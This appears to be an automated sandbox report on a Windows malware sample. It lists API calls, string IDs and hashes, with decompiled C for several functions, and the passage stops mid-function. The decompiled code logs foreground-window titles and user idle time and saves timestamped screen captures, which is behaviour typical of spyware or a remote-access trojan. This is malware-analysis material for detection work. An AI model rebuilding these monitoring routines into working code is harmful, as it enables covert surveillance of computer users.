                    0x00453977
                    0x0045395d
                    0x00453941
                    0x00453906
                    0x004538f2
                    0x00453a1f
                    0x00453a25
                    0x004538cd
                    0x0045380e
                    0x004537da
                    0x00453a27
                    0x00453a3a

                    APIs
                    • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00453A6C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 0045383F
                    • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00453A6C,00000000,00000000,?,00000001,?,?,?,?), ref: 004538C2
                    • __alloca_probe_16.LIBCMT ref: 004538FA
                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,l:E,?,00453A6C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453955
                    • __alloca_probe_16.LIBCMT ref: 004539A4
                    • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,00453A6C,00000000,00000000,?,00000001,?,?,?,?), ref: 0045396C
                      • Part of subcall function 00445B29: RtlAllocateHeap.NTDLL(00000000,00434CD9,?,?,00438257,?,?,pth_unenc,?,?,0040DC6B,00434CD9,?,?,?,?), ref: 00445B5B
                    • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,00453A6C,00000000,00000000,?,00000001,?,?,?,?), ref: 004539E8
                    • __freea.LIBCMT ref: 00453A13
                    • __freea.LIBCMT ref: 00453A1F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                    • String ID: l:E
                    • API String ID: 201697637-2643689520
                    • Opcode ID: 487c4a73ce203df05c44bbd6f4d6fba224ab859dd954da5c12ff38a99e7ccec5
                    • Instruction ID: eb992bb4c3ae4a40e52deb0fb7f5493a45bfb281ffc1b362b3e6f882f954ce90
                    • Opcode Fuzzy Hash: 487c4a73ce203df05c44bbd6f4d6fba224ab859dd954da5c12ff38a99e7ccec5
                    • Instruction Fuzzy Hash: 8391D5B1E002169ADB249E65C881AEFBBF59F09397F14452BFC00E7242D739DE49C768
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 38%
                    			E004147BD(char _a4, signed short _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, signed char _a28) {
                    				intOrPtr _v0;
                    				short _v4;
                    				char _v8;
                    				char* _v12;
                    				signed short _v20;
                    				intOrPtr _v24;
                    				char _t36;
                    				short _t37;
                    				intOrPtr* _t44;
                    				void* _t47;
                    				void* _t49;
                    				char* _t52;
                    				signed short* _t58;
                    				signed char _t63;
                    				intOrPtr _t64;
                    				signed short _t69;
                    				void* _t71;
                    				void* _t72;
                    				intOrPtr _t73;
                    				intOrPtr* _t74;
                    				intOrPtr _t76;
                    				void* _t77;
                    
                    				_t77 =  &_v12;
                    				_t36 =  *((intOrPtr*)("65535")); // 0x33353536
                    				_v8 = _t36;
                    				_t37 =  *0x46b610; // 0x35
                    				_t74 = _a4;
                    				_v4 = _t37;
                    				_v12 =  &_v8;
                    				if(_t74 == 0 || _a8 < 0x10) {
                    					L42:
                    					return 0x2afb;
                    				} else {
                    					_t71 = 2;
                    					if( *_t74 != _t71) {
                    						return 0x273f;
                    					}
                    					_t76 = _a24;
                    					_t64 = _a20;
                    					_t73 = _a16;
                    					if(_a12 == 0 || _t73 == 0) {
                    						if(_t64 == 0 || _t76 == 0) {
                    							return 0x2af9;
                    						} else {
                    							goto L8;
                    						}
                    					} else {
                    						L8:
                    						_t63 = _a28;
                    						_t42 = _t63 & 0x00000006;
                    						if((_t63 & 0x00000006) != 6) {
                    							if(_t64 == 0 || _t76 == 0) {
                    								L21:
                    								if(_a12 == 0 || _t73 == 0) {
                    									L40:
                    									return 0;
                    								} else {
                    									_t44 =  *((intOrPtr*)(_t74 + 4));
                    									_a4 = _t44;
                    									if((_t63 & 0x00000002) == 0) {
                    										_t44 =  &_a4;
                    										__imp__#51(_t44, 4, _t71);
                    										if(_t44 == 0) {
                    											L30:
                    											if((_t63 & 0x00000004) == 0) {
                    												_push(_v8);
                    												L37:
                    												__imp__#12();
                    												_t75 = _t44;
                    												L38:
                    												if(_t73 <= E0043A3A0(_t75)) {
                    													goto L42;
                    												}
                    												E0044141E(_v4, _t73, _t75);
                    												goto L40;
                    											}
                    											__imp__#111();
                    											_t47 = _t44 - 0x2af9;
                    											if(_t47 == 0) {
                    												L34:
                    												return 0x2af9;
                    											}
                    											_t49 = _t47 - 1;
                    											if(_t49 == 0) {
                    												return 0x2afa;
                    											}
                    											if(_t49 == 1) {
                    												goto L42;
                    											}
                    											goto L34;
                    										}
                    										_t75 =  *_t44;
                    										if( *_t44 == 0) {
                    											goto L30;
                    										}
                    										if((_t63 & 0x00000001) != 0) {
                    											_t52 = L0041415B(_t75, 0x2e);
                    											if(_t52 != 0) {
                    												 *_t52 = 0;
                    											}
                    										}
                    										goto L38;
                    									}
                    									_push(_t44);
                    									goto L37;
                    								}
                    							} else {
                    								_t69 =  *(_t74 + 2) & 0x0000ffff;
                    								_a8 = _t69;
                    								if((_t63 & 0x00000008) == 0) {
                    									_t72 = 0;
                    									_t54 =  ==  ? _t72 : "udp";
                    									_t42 = _t69 & 0x0000ffff;
                    									__imp__#56(_t42,  ==  ? _t72 : "udp");
                    									if(_t42 == 0) {
                    										L17:
                    										_push(_v0);
                    										L18:
                    										__imp__#15();
                    										E004141E0( &_v20, 6, "%u", _t42 & 0x0000ffff);
                    										_t58 =  &_v20;
                    										_t77 = _t77 + 0x10;
                    										L19:
                    										if(_t76 <= E0043A3A0(_t58)) {
                    											goto L42;
                    										}
                    										E0044141E(_a8, _t76, _v24);
                    										_t77 = _t77 + 0xc;
                    										_t71 = 2;
                    										goto L21;
                    									}
                    									_t42 =  *_t42;
                    									if(_t42 == 0) {
                    										goto L17;
                    									}
                    									_v20 = _t42;
                    									goto L19;
                    								}
                    								_push(_t69);
                    								goto L18;
                    							}
                    						}
                    						return 0x2726;
                    					}
                    				}
                    			}

























                    0x004147bd
                    0x004147c0
                    0x004147c6
                    0x004147ca
                    0x004147d2
                    0x004147d6
                    0x004147df
                    0x004147e6
                    0x00414984
                    0x00000000
                    0x004147f7
                    0x004147f9
                    0x004147fd
                    0x00000000
                    0x004147ff
                    0x0041480e
                    0x00414812
                    0x00414816
                    0x0041481a
                    0x00414822
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00414830
                    0x00414830
                    0x00414830
                    0x00414836
                    0x0041483b
                    0x00414849
                    0x004148d9
                    0x004148de
                    0x00414979
                    0x00000000
                    0x004148ec
                    0x004148ec
                    0x004148ef
                    0x004148f6
                    0x004148fe
                    0x00414903
                    0x0041490b
                    0x0041492b
                    0x0041492e
                    0x00414954
                    0x00414958
                    0x00414958
                    0x0041495e
                    0x00414960
                    0x00414969
                    0x00000000
                    0x00000000
                    0x00414971
                    0x00000000
                    0x00414976
                    0x00414930
                    0x0041493b
                    0x0041493d
                    0x00414949
                    0x00000000
                    0x00414949
                    0x0041493f
                    0x00414942
                    0x00000000
                    0x0041494d
                    0x00414947
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00414947
                    0x0041490d
                    0x00414911
                    0x00000000
                    0x00000000
                    0x00414916
                    0x0041491b
                    0x00414924
                    0x00414926
                    0x00414926
                    0x00414924
                    0x00000000
                    0x00414916
                    0x004148f8
                    0x00000000
                    0x004148f8
                    0x00414857
                    0x00414857
                    0x0041485b
                    0x00414862
                    0x00414869
                    0x00414872
                    0x00414876
                    0x0041487a
                    0x00414882
                    0x00414890
                    0x00414890
                    0x00414894
                    0x00414894
                    0x004148aa
                    0x004148af
                    0x004148b3
                    0x004148b6
                    0x004148bf
                    0x00000000
                    0x00000000
                    0x004148ce
                    0x004148d3
                    0x004148d8
                    0x00000000
                    0x004148d8
                    0x00414884
                    0x00414888
                    0x00000000
                    0x00000000
                    0x0041488a
                    0x00000000
                    0x0041488a
                    0x00414864
                    0x00000000
                    0x00414864
                    0x00414849
                    0x00000000
                    0x0041483d
                    0x0041481a

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 65535$udp
                    • API String ID: 0-1267037602
                    • Opcode ID: 1e2b1e4dc0f3975402f310b388a9d22573e4c46ecc1d8720dee94e2fa26c3f5b
                    • Instruction ID: 22815362587def24c58c896f6991788c600429917773681de387a7ae3849f8a7
                    • Opcode Fuzzy Hash: 1e2b1e4dc0f3975402f310b388a9d22573e4c46ecc1d8720dee94e2fa26c3f5b
                    • Instruction Fuzzy Hash: 5951F4B92553069BD3209A69D804BBB77D8EFC5754F08043FF88196350EB2CC8C19B6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 89%
                    			E0040AB4B(void* __ecx, void* __edx) {
                    				char _v28;
                    				char _v56;
                    				char _v76;
                    				char _v80;
                    				char _v100;
                    				void* _v104;
                    				char _v108;
                    				char _v112;
                    				struct HWND__* _v116;
                    				void* __ebx;
                    				void* __edi;
                    				void* __ebp;
                    				int _t36;
                    				struct HWND__* _t42;
                    				void* _t50;
                    				int _t57;
                    				struct HWND__* _t77;
                    				void* _t119;
                    				void* _t125;
                    				signed int _t126;
                    				void* _t128;
                    
                    				_t112 = __edx;
                    				_t128 = (_t126 & 0xfffffff8) - 0x74;
                    				_push(_t77);
                    				_push(0xea60);
                    				_t119 = __ecx;
                    				while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
                    					Sleep(0x1f4);
                    					_t77 = GetForegroundWindow();
                    					_t36 = GetWindowTextLengthW(_t77);
                    					_t4 = _t36 + 1; // 0x1
                    					E0040B779(_t77,  &_v100, _t112, _t119, _t125, _t4, 0);
                    					if(_t36 != 0) {
                    						_t57 = E0040247C();
                    						GetWindowTextW(_t77, E00401F04( &_v100), _t57);
                    						_t112 = 0x475ccc;
                    						if(E0040B841(0x475ccc) == 0) {
                    							E0040B761(0x475ccc,  &_v100);
                    							E00408F6B(E0040247C() - 1);
                    							_t128 = _t128 - 0x18;
                    							_t137 =  *0x474123;
                    							if( *0x474123 == 0) {
                    								_t112 = E0040B7F1( &_v76, L"\r\n[", _t125,  &_v108);
                    								E00403014(_t77, _t128, _t67, _t119, _t125, __eflags, L"]\r\n");
                    								E0040A4AB(_t119);
                    								E00401F09();
                    							} else {
                    								E00408F83(_t77, _t128, 0x475ccc, _t137,  &_v108);
                    								E0040AFD9(_t77, _t119, _t137);
                    							}
                    						}
                    					}
                    					_t83 = _t119;
                    					E0040B5BD(_t119);
                    					if(E0041B57B(_t119) < 0xea60) {
                    						L18:
                    						E00401F09();
                    						continue;
                    					} else {
                    						_t77 = _v116;
                    						while( *((char*)(_t119 + 0x49)) != 0 ||  *((char*)(_t119 + 0x4a)) != 0) {
                    							_t42 = E0041B57B(_t83);
                    							if(_t42 < 0xea60) {
                    								__eflags = _t77 % 0xea60;
                    								E00441861(_t83, _t77 / 0xea60,  &_v112, 0xa);
                    								_t50 = E00406383(_t77,  &_v80, E004052FD(_t77,  &_v56, "\r\n{ User has been idle for ", _t125, __eflags, E00402093(_t77,  &_v28, _t77 % 0xea60, _t125,  &_v112)), _t119, _t125, __eflags, " minutes }\r\n");
                    								_t128 = _t128 + 0xc - 0x14;
                    								_t112 = _t50;
                    								E0041B6F3(_t128, _t50);
                    								E0040A4AB(_t119);
                    								E00401FD8();
                    								E00401FD8();
                    								E00401FD8();
                    								goto L18;
                    							}
                    							_t77 = _t42;
                    							_v116 = _t77;
                    							Sleep(0x3e8);
                    						}
                    						E00401F09();
                    						break;
                    					}
                    				}
                    				__eflags = 0;
                    				return 0;
                    			}
























                    0x0040ab4b
                    0x0040ab51
                    0x0040ab54
                    0x0040ab55
                    0x0040ab57
                    0x0040ab59
                    0x0040abb8
                    0x0040abc4
                    0x0040abc7
                    0x0040abd1
                    0x0040abd9
                    0x0040abe0
                    0x0040abea
                    0x0040abfb
                    0x0040ac01
                    0x0040ac11
                    0x0040ac1d
                    0x0040ac31
                    0x0040ac36
                    0x0040ac3d
                    0x0040ac44
                    0x0040ac6e
                    0x0040ac72
                    0x0040ac7a
                    0x0040ac83
                    0x0040ac46
                    0x0040ac49
                    0x0040ac50
                    0x0040ac50
                    0x0040ac44
                    0x0040ac11
                    0x0040ac88
                    0x0040ac8a
                    0x0040ac9b
                    0x0040ad43
                    0x0040ad47
                    0x00000000
                    0x0040aca1
                    0x0040aca1
                    0x0040aca5
                    0x0040acb5
                    0x0040acbc
                    0x0040acdc
                    0x0040acdf
                    0x0040ad10
                    0x0040ad15
                    0x0040ad18
                    0x0040ad1c
                    0x0040ad23
                    0x0040ad2c
                    0x0040ad35
                    0x0040ad3e
                    0x00000000
                    0x0040ad3e
                    0x0040acbe
                    0x0040acc5
                    0x0040acc9
                    0x0040acc9
                    0x0040ad55
                    0x00000000
                    0x0040ad55
                    0x0040ac9b
                    0x0040ad5c
                    0x0040ad62

                    APIs
                    • __Init_thread_footer.LIBCMT ref: 0040ABAD
                    • Sleep.KERNEL32(000001F4), ref: 0040ABB8
                    • GetForegroundWindow.USER32 ref: 0040ABBE
                    • GetWindowTextLengthW.USER32(00000000), ref: 0040ABC7
                    • GetWindowTextW.USER32 ref: 0040ABFB
                    • Sleep.KERNEL32(000003E8), ref: 0040ACC9
                      • Part of subcall function 0040A4AB: SetEvent.KERNEL32(?,?,00000000,0040B07F,00000000), ref: 0040A4D7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                    • String ID: [${ User has been idle for $ minutes }$]
                    • API String ID: 911427763-3954389425
                    • Opcode ID: e69c60ca6e480eec65f39470e2d04cd410e461d1c5980ab9b2c0bce673478e3e
                    • Instruction ID: a6b310b72efbe69336879df5cfb62dca56e79c28c1dd86f8f020668a11468af5
                    • Opcode Fuzzy Hash: e69c60ca6e480eec65f39470e2d04cd410e461d1c5980ab9b2c0bce673478e3e
                    • Instruction Fuzzy Hash: 2951D0316083005BD304F736C856A6E77A5AB84308F40093FF586A66E2EFBC9945C68F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0043A24A(void* __edx, void* __eflags, char* _a4, int _a8, char* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                    				int _v8;
                    				int _v12;
                    				char _v16;
                    				intOrPtr _v24;
                    				char _v28;
                    				void* __ebx;
                    				char* _t31;
                    				int _t35;
                    				int _t43;
                    				void* _t51;
                    				int _t52;
                    				int _t54;
                    				void* _t56;
                    				void* _t63;
                    				short* _t64;
                    				short* _t67;
                    
                    				_t62 = __edx;
                    				E0043A1C7(_t51,  &_v28, __edx, _a24);
                    				_t52 = 0;
                    				_t54 =  *(_v24 + 0x14);
                    				_t31 = _a4;
                    				_v8 = _t54;
                    				if(_t31 == 0) {
                    					L4:
                    					 *((intOrPtr*)(E0043FFBD())) = 0x16;
                    					E0043B6B0();
                    					L18:
                    					if(_v16 != 0) {
                    						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                    					}
                    					return _t52;
                    				}
                    				_t66 = _a8;
                    				if(_a8 == 0) {
                    					goto L4;
                    				}
                    				 *_t31 = 0;
                    				if(_a12 == 0 || _a16 == 0) {
                    					goto L4;
                    				} else {
                    					_t35 = MultiByteToWideChar(_t54, 0, _a12, 0xffffffff, 0, 0);
                    					_v12 = _t35;
                    					if(_t35 != 0) {
                    						_t64 = E00445B29(_t54, _t35 + _t35);
                    						_t56 = _t63;
                    						if(_t64 != 0) {
                    							if(MultiByteToWideChar(_v8, 0, _a12, 0xffffffff, _t64, _v12) != 0) {
                    								_t67 = E00445B29(_t56, _t66 + _t66);
                    								if(_t67 != 0) {
                    									_t43 = E004473D0(0, _t62, _t67, _a8, _t64, _a16, _a20, _a24);
                    									_v12 = _t43;
                    									if(_t43 != 0) {
                    										if(WideCharToMultiByte(_v8, 0, _t67, 0xffffffff, _a4, _a8, 0, 0) != 0) {
                    											_t52 = _v12;
                    										} else {
                    											E0043FF87(GetLastError());
                    										}
                    									}
                    								}
                    								E00446172(_t67);
                    							} else {
                    								E0043FF87(GetLastError());
                    							}
                    						}
                    						E00446172(_t64);
                    					} else {
                    						E0043FF87(GetLastError());
                    					}
                    					goto L18;
                    				}
                    			}



















                    0x0043a24a
                    0x0043a25a
                    0x0043a262
                    0x0043a264
                    0x0043a267
                    0x0043a26a
                    0x0043a26f
                    0x0043a284
                    0x0043a289
                    0x0043a28f
                    0x0043a361
                    0x0043a365
                    0x0043a36a
                    0x0043a36a
                    0x0043a378
                    0x0043a378
                    0x0043a271
                    0x0043a276
                    0x00000000
                    0x00000000
                    0x0043a278
                    0x0043a27d
                    0x00000000
                    0x0043a299
                    0x0043a2a2
                    0x0043a2a8
                    0x0043a2ad
                    0x0043a2ca
                    0x0043a2cc
                    0x0043a2cf
                    0x0043a2ea
                    0x0043a303
                    0x0043a308
                    0x0043a318
                    0x0043a320
                    0x0043a325
                    0x0043a33e
                    0x0043a34f
                    0x0043a340
                    0x0043a347
                    0x0043a34c
                    0x0043a33e
                    0x0043a325
                    0x0043a353
                    0x0043a2ec
                    0x0043a2f3
                    0x0043a2f3
                    0x0043a358
                    0x0043a35a
                    0x0043a2af
                    0x0043a2b6
                    0x0043a2bb
                    0x00000000
                    0x0043a2ad

                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A2A2
                    • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A2AF
                    • __dosmaperr.LIBCMT ref: 0043A2B6
                    • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A2E2
                    • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A2EC
                    • __dosmaperr.LIBCMT ref: 0043A2F3
                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A336
                    • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A340
                    • __dosmaperr.LIBCMT ref: 0043A347
                    • _free.LIBCMT ref: 0043A353
                    • _free.LIBCMT ref: 0043A35A
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                    • String ID:
                    • API String ID: 2441525078-0
                    • Opcode ID: 9e76d05ab1a6dae5fa914f4d022ac63f524e3af652392d3f01072c5e5aace592
                    • Instruction ID: d37e1853ff443d8dd96a763c66dd90005ba36c0e2487a5d778710e545995e0c5
                    • Opcode Fuzzy Hash: 9e76d05ab1a6dae5fa914f4d022ac63f524e3af652392d3f01072c5e5aace592
                    • Instruction Fuzzy Hash: 3931E272804249AFDF119FA5DC459AF3B68EF09325F14016EFC1096261DB39CC61DB6A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E00419A49() {
                    				intOrPtr* _t42;
                    				void* _t45;
                    				char* _t54;
                    				void* _t72;
                    				long _t78;
                    				void* _t83;
                    				struct _SECURITY_ATTRIBUTES* _t85;
                    				struct _SECURITY_ATTRIBUTES* _t92;
                    				void* _t131;
                    				void* _t132;
                    				void* _t140;
                    				void* _t141;
                    				void* _t146;
                    				intOrPtr _t147;
                    				void* _t148;
                    				void* _t149;
                    				void* _t150;
                    
                    				E00457438(E00457863, _t146);
                    				_push(_t141);
                    				 *((intOrPtr*)(_t146 - 0x10)) = _t147;
                    				_t92 = 0;
                    				 *((intOrPtr*)(_t146 - 4)) = 0;
                    				_t149 =  *0x473acc - _t92; // 0x0
                    				if(_t149 == 0) {
                    					_t147 = _t147 - 0xc;
                    					_t131 = _t146 - 0x68;
                    					E00418094(_t131);
                    					__imp__GdiplusStartup(0x473acc, _t131, 0);
                    				}
                    				_t150 =  *0x471d94 - _t92; // 0x0
                    				if(_t150 == 0) {
                    					E00401F13(0x474698, _t132, _t141, E00418F59(_t146 - 0x40, _t132));
                    					E00401F09();
                    				}
                    				_t42 = E00401FAB(E00401E65(0x4740cc, _t132, _t146, _t150, 0x19));
                    				_t45 = E00401F04(E0041B6F3(_t146 - 0x58, E00401E65(0x4740cc, _t132, _t146, _t150, 0x1a)));
                    				_t134 =  *_t42;
                    				E00401F13(0x4746b0,  *_t42, 0x4746b0, E0040D83D(_t146 - 0x40,  *_t42, _t45));
                    				E00401F09();
                    				E00401F09();
                    				CreateDirectoryW(E00401F04(0x4746b0), _t92);
                    				E00401F86(_t92, _t146 - 0xb0);
                    				E00401F86(_t92, _t146 - 0x80);
                    				 *(_t146 - 0x11) = _t92;
                    				 *0x471d63 = 1;
                    				_t54 =  *((intOrPtr*)(_t146 + 8));
                    				_t145 =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
                    				 *(_t146 - 0x18) =  !=  ? L"time_%04i%02i%02i_%02i%02i%02i" : L"wnd_%04i%02i%02i_%02i%02i%02i";
                    				_t140 = Sleep;
                    				L6:
                    				while(1) {
                    					if( *_t54 != 1) {
                    						L11:
                    						GetLocalTime(_t146 - 0x28);
                    						_push( *(_t146 - 0x1c) & 0x0000ffff);
                    						_push( *(_t146 - 0x1e) & 0x0000ffff);
                    						_push( *(_t146 - 0x20) & 0x0000ffff);
                    						_push( *(_t146 - 0x22) & 0x0000ffff);
                    						_push( *(_t146 - 0x26) & 0x0000ffff);
                    						E0041806E(_t146 - 0x2b8, _t145,  *(_t146 - 0x28) & 0x0000ffff);
                    						_t147 = _t147 + 0x20;
                    						E00401F13(_t146 - 0x80, _t66, _t145, E00403014(_t92, _t146 - 0x58, E00403014(_t92, _t146 - 0x40, E00409082(_t146 - 0x98, 0x4746b0, _t146, "\\"), _t140, _t146, __eflags, _t146 - 0x2b8), _t140, _t146, __eflags, 0x465510));
                    						E00401F09();
                    						E00401F09();
                    						E00401F09();
                    						_t72 = E00401F04(_t146 - 0x80);
                    						_t134 =  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1));
                    						E00419903(_t72,  *((intOrPtr*)( *((intOrPtr*)(_t146 + 8)) + 1)), __eflags);
                    						__eflags =  *((char*)( *((intOrPtr*)(_t146 + 8))));
                    						if(__eflags != 0) {
                    							_t92 = 0;
                    							 *(_t146 - 0x11) = 0;
                    							_t78 = E0043B4A1(_t75, E00401FAB(E00401E65(0x4740cc, _t134, _t146, __eflags, 0x18))) * 0x3e8;
                    							__eflags = _t78;
                    						} else {
                    							_t78 = E0043B4A1(_t79, E00401FAB(E00401E65(0x4740cc, _t134, _t146, __eflags, 0x15))) * 0xea60;
                    						}
                    						Sleep(_t78);
                    						_t54 =  *((intOrPtr*)(_t146 + 8));
                    						continue;
                    					}
                    					_t145 = L"wnd_%04i%02i%02i_%02i%02i%02i";
                    					 *(_t146 - 0x18) = L"wnd_%04i%02i%02i_%02i%02i%02i";
                    					while(1) {
                    						_t153 = _t92;
                    						if(_t92 != 0) {
                    							goto L11;
                    						}
                    						_t83 = E00401FAB(E00401E65(0x4740cc, _t134, _t146, _t153, 0x17));
                    						_t148 = _t147 - 0x18;
                    						E0040417E(_t92, _t148, _t134, _t146, _t83);
                    						_t85 = E0041BFE6(0, _t134);
                    						_t147 = _t148 + 0x18;
                    						_t92 = _t85;
                    						 *(_t146 - 0x11) = _t92;
                    						if(_t92 != 0) {
                    							goto L11;
                    						}
                    						Sleep(0x3e8);
                    					}
                    					goto L11;
                    				}
                    			}




















                    0x00419a4e
                    0x00419a5a
                    0x00419a5c
                    0x00419a5f
                    0x00419a61
                    0x00419a64
                    0x00419a6a
                    0x00419a6c
                    0x00419a6f
                    0x00419a72
                    0x00419a80
                    0x00419a80
                    0x00419a86
                    0x00419a8c
                    0x00419a9c
                    0x00419aa4
                    0x00419aa4
                    0x00419ab9
                    0x00419ad5
                    0x00419adb
                    0x00419aee
                    0x00419af6
                    0x00419afe
                    0x00419b0c
                    0x00419b18
                    0x00419b20
                    0x00419b25
                    0x00419b28
                    0x00419b39
                    0x00419b3f
                    0x00419b42
                    0x00419b45
                    0x00000000
                    0x00419b4b
                    0x00419b4e
                    0x00419b96
                    0x00419b9a
                    0x00419ba4
                    0x00419ba9
                    0x00419bae
                    0x00419bb3
                    0x00419bb8
                    0x00419bc6
                    0x00419bcb
                    0x00419c0a
                    0x00419c12
                    0x00419c1a
                    0x00419c25
                    0x00419c2d
                    0x00419c35
                    0x00419c3a
                    0x00419c47
                    0x00419c4a
                    0x00419c68
                    0x00419c6a
                    0x00419c81
                    0x00419c81
                    0x00419c4c
                    0x00419c60
                    0x00419c60
                    0x00419c89
                    0x00419c8b
                    0x00000000
                    0x00419c8b
                    0x00419b50
                    0x00419b55
                    0x00419b58
                    0x00419b58
                    0x00419b5a
                    0x00000000
                    0x00000000
                    0x00419b6a
                    0x00419b6f
                    0x00419b75
                    0x00419b7c
                    0x00419b81
                    0x00419b84
                    0x00419b86
                    0x00419b8b
                    0x00000000
                    0x00000000
                    0x00419b92
                    0x00419b92
                    0x00000000
                    0x00419b58

                    APIs
                    • __EH_prolog.LIBCMT ref: 00419A4E
                    • GdiplusStartup.GDIPLUS(00473ACC,?,00000000), ref: 00419A80
                    • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 00419B0C
                    • Sleep.KERNEL32(000003E8), ref: 00419B92
                    • GetLocalTime.KERNEL32(?), ref: 00419B9A
                    • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419C89
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                    • String ID: X2}$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                    • API String ID: 489098229-3016056902
                    • Opcode ID: b96dc954ca238372d2a18e8156f8ee7b5740f13ffd9048aa4a2d294b9c84fc62
                    • Instruction ID: 48ddcd66ec405a3f4dd2086f7d9ebecfe3bf8900b24447c73ec94136457d6fe6
                    • Opcode Fuzzy Hash: b96dc954ca238372d2a18e8156f8ee7b5740f13ffd9048aa4a2d294b9c84fc62
                    • Instruction Fuzzy Hash: 27518170A041459ACB14BBB5C8529FD7B68AF55308F40003FF549A71D2EF3C9D85C798
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E004054A0(char* __edx, void* __eflags, intOrPtr _a4) {
                    				struct tagMSG _v52;
                    				void* _v56;
                    				char _v60;
                    				char _v76;
                    				char _v80;
                    				char _v84;
                    				char _v104;
                    				char _v108;
                    				void* _v112;
                    				char _v116;
                    				char _v120;
                    				char _v140;
                    				void* _v176;
                    				void* __ebx;
                    				void* __ebp;
                    				intOrPtr* _t28;
                    				char* _t36;
                    				intOrPtr _t45;
                    				intOrPtr _t46;
                    				void* _t57;
                    				intOrPtr _t69;
                    				void* _t111;
                    				void* _t113;
                    				void* _t115;
                    				void* _t117;
                    				signed int _t118;
                    				void* _t121;
                    				void* _t122;
                    				void* _t123;
                    				void* _t124;
                    
                    				_t126 = __eflags;
                    				_t101 = __edx;
                    				_t69 = _a4;
